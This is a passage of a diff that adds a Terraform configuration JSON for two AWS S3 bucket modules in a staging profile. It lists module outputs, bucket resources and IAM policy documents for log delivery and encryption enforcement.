+                    "profile": {
+                        "constant_value": "razorpay-stage"
+                    },
+                    "region": {
+                        "constant_value": "eu-central-1"
+                    }
+                }
+            },
+            "module.s3-bucket-1:aws": {
+                "name": "aws",
+                "version_constraint": ">= 5.27.0",
+                "module_address": "module.s3-bucket-1"
+            },
+            "module.s3-bucket-2:aws": {
+                "name": "aws",
+                "version_constraint": ">= 5.27.0",
+                "module_address": "module.s3-bucket-2"
+            }
+        },
+        "root_module": {
+            "module_calls": {
+                "s3-bucket-1": {
+                    "source": "terraform-aws-modules/s3-bucket/aws",
+                    "module": {
+                        "outputs": {
+                            "s3_bucket_arn": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].arn",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname."
+                            },
+                            "s3_bucket_bucket_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com."
+                            },
+                            "s3_bucket_bucket_regional_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_regional_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL."
+                            },
+                            "s3_bucket_hosted_zone_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].hosted_zone_id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The Route 53 Hosted Zone ID for this bucket's region."
+                            },
+                            "s3_bucket_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].id",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this",
+                                        "aws_s3_bucket.this[0].id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The name of the bucket."
+                            },
+                            "s3_bucket_lifecycle_configuration_rules": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_lifecycle_configuration.this[0].rule",
+                                        "aws_s3_bucket_lifecycle_configuration.this[0]",
+                                        "aws_s3_bucket_lifecycle_configuration.this"
+                                    ]
+                                },
+                                "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string."
+                            },
+                            "s3_bucket_policy": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].policy",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this"
+                                    ]
+                                },
+                                "description": "The policy of the bucket, if the bucket is configured with a policy. If not, this will be an empty string."
+                            },
+                            "s3_bucket_region": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].region",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The AWS region this bucket resides in."
+                            },
+                            "s3_bucket_website_domain": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_domain",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. This is used to create Route 53 alias records."
+                            },
+                            "s3_bucket_website_endpoint": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_endpoint",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string."
+                            }
+                        },
+                        "resources": [
+                            {
+                                "address": "aws_s3_bucket.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "var.bucket"
+                                        ]
+                                    },
+                                    "bucket_prefix": {
+                                        "references": [
+                                            "var.bucket_prefix"
+                                        ]
+                                    },
+                                    "force_destroy": {
+                                        "references": [
+                                            "var.force_destroy"
+                                        ]
+                                    },
+                                    "object_lock_enabled": {
+                                        "references": [
+                                            "var.object_lock_enabled"
+                                        ]
+                                    },
+                                    "tags": {
+                                        "references": [
+                                            "var.tags"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_accelerate_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_accelerate_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "var.acceleration_status"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.acceleration_status"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_acl.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_acl",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "acl": {
+                                        "references": [
+                                            "var.acl",
+                                            "var.acl"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_ownership_controls.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_analytics_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_analytics_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.analytics_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_cors_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_cors_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.cors_rules"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_intelligent_tiering_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_intelligent_tiering_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "each.value.status",
+                                            "each.value",
+                                            "each.value.status",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.intelligent_tiering",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_inventory.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_inventory",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "each.value.bucket",
+                                            "each.value",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "destination": [
+                                        {
+                                            "bucket": [
+                                                {
+                                                    "account_id": {
+                                                        "references": [
+                                                            "each.value.destination.account_id",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "bucket_arn": {
+                                                        "references": [
+                                                            "each.value.destination.bucket_arn",
+                                                            "each.value.destination",
+                                                            "each.value",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this"
+                                                        ]
+                                                    },
+                                                    "format": {
+                                                        "references": [
+                                                            "each.value.destination.format",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "prefix": {
+                                                        "references": [
+                                                            "each.value.destination.prefix",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "enabled": {
+                                        "references": [
+                                            "each.value.enabled",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "included_object_versions": {
+                                        "references": [
+                                            "each.value.included_object_versions",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "optional_fields": {
+                                        "references": [
+                                            "each.value.optional_fields",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "schedule": [
+                                        {
+                                            "frequency": {
+                                                "references": [
+                                                    "each.value.frequency",
+                                                    "each.value"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.inventory_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_lifecycle_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_lifecycle_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.lifecycle_rules"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_logging.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_logging",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "target_bucket": {
+                                        "references": [
+                                            "var.logging[\"target_bucket\"]",
+                                            "var.logging"
+                                        ]
+                                    },
+                                    "target_prefix": {
+                                        "references": [
+                                            "var.logging[\"target_prefix\"]",
+                                            "var.logging"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.logging"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_metric.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_metric",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.value.name",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.metric_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_object_lock_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_object_lock_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "default_retention": [
+                                                {
+                                                    "days": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.days",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "mode": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.mode",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "years": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.years",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "token": {
+                                        "references": [
+                                            "var.object_lock_configuration.token",
+                                            "var.object_lock_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.object_lock_enabled",
+                                        "var.object_lock_configuration.rule.default_retention",
+                                        "var.object_lock_configuration.rule",
+                                        "var.object_lock_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_ownership_controls.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_ownership_controls",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "local.attach_policy",
+                                            "aws_s3_bucket_policy.this[0].id",
+                                            "aws_s3_bucket_policy.this[0]",
+                                            "aws_s3_bucket_policy.this",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "object_ownership": {
+                                                "references": [
+                                                    "var.object_ownership"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.control_object_ownership"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_policy.this",
+                                    "aws_s3_bucket_public_access_block.this",
+                                    "aws_s3_bucket.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_policy.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_policy",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "policy": {
+                                        "references": [
+                                            "data.aws_iam_policy_document.combined[0].json",
+                                            "data.aws_iam_policy_document.combined[0]",
+                                            "data.aws_iam_policy_document.combined"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_public_access_block.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_public_access_block.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_public_access_block",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "block_public_acls": {
+                                        "references": [
+                                            "var.block_public_acls"
+                                        ]
+                                    },
+                                    "block_public_policy": {
+                                        "references": [
+                                            "var.block_public_policy"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "ignore_public_acls": {
+                                        "references": [
+                                            "var.ignore_public_acls"
+                                        ]
+                                    },
+                                    "restrict_public_buckets": {
+                                        "references": [
+                                            "var.restrict_public_buckets"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_public_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_replication_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_replication_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "role": {
+                                        "references": [
+                                            "var.replication_configuration[\"role\"]",
+                                            "var.replication_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.replication_configuration"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_request_payment_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_request_payment_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "payer": {
+                                        "references": [
+                                            "var.request_payer"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.request_payer"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_server_side_encryption_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_server_side_encryption_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.server_side_encryption_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_versioning.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_versioning",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "mfa": {
+                                        "references": [
+                                            "var.versioning[\"mfa\"]",
+                                            "var.versioning"
+                                        ]
+                                    },
+                                    "versioning_configuration": [
+                                        {
+                                            "mfa_delete": {
+                                                "references": [
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning"
+                                                ]
+                                            },
+                                            "status": {
+                                                "references": [
+                                                    "var.versioning[\"enabled\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.versioning"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_website_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_website_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.website"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_canonical_user_id.this",
+                                "mode": "data",
+                                "type": "aws_canonical_user_id",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl",
+                                        "var.owner[\"id\"]",
+                                        "var.owner"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.access_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "access_log_delivery",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_access_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.combined",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "combined",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "source_policy_documents": {
+                                        "references": [
+                                            "var.attach_elb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.elb_log_delivery",
+                                            "var.attach_lb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.lb_log_delivery",
+                                            "var.attach_access_log_delivery_policy",
+                                            "data.aws_iam_policy_document.access_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.access_log_delivery[0]",
+                                            "data.aws_iam_policy_document.access_log_delivery",
+                                            "var.attach_require_latest_tls_policy",
+                                            "data.aws_iam_policy_document.require_latest_tls[0].json",
+                                            "data.aws_iam_policy_document.require_latest_tls[0]",
+                                            "data.aws_iam_policy_document.require_latest_tls",
+                                            "var.attach_deny_insecure_transport_policy",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0].json",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0]",
+                                            "data.aws_iam_policy_document.deny_insecure_transport",
+                                            "var.attach_deny_unencrypted_object_uploads",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                            "var.attach_deny_incorrect_kms_key_sse",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                            "var.attach_deny_incorrect_encryption_headers",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                            "var.attach_inventory_destination_policy",
+                                            "var.attach_analytics_destination_policy",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                            "var.attach_policy",
+                                            "var.policy"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_encryption_headers",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm",
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default",
+                                                            "var.server_side_encryption_configuration.rule",
+                                                            "var.server_side_encryption_configuration"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectEncryptionHeaders"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_encryption_headers"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_kms_key_sse",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
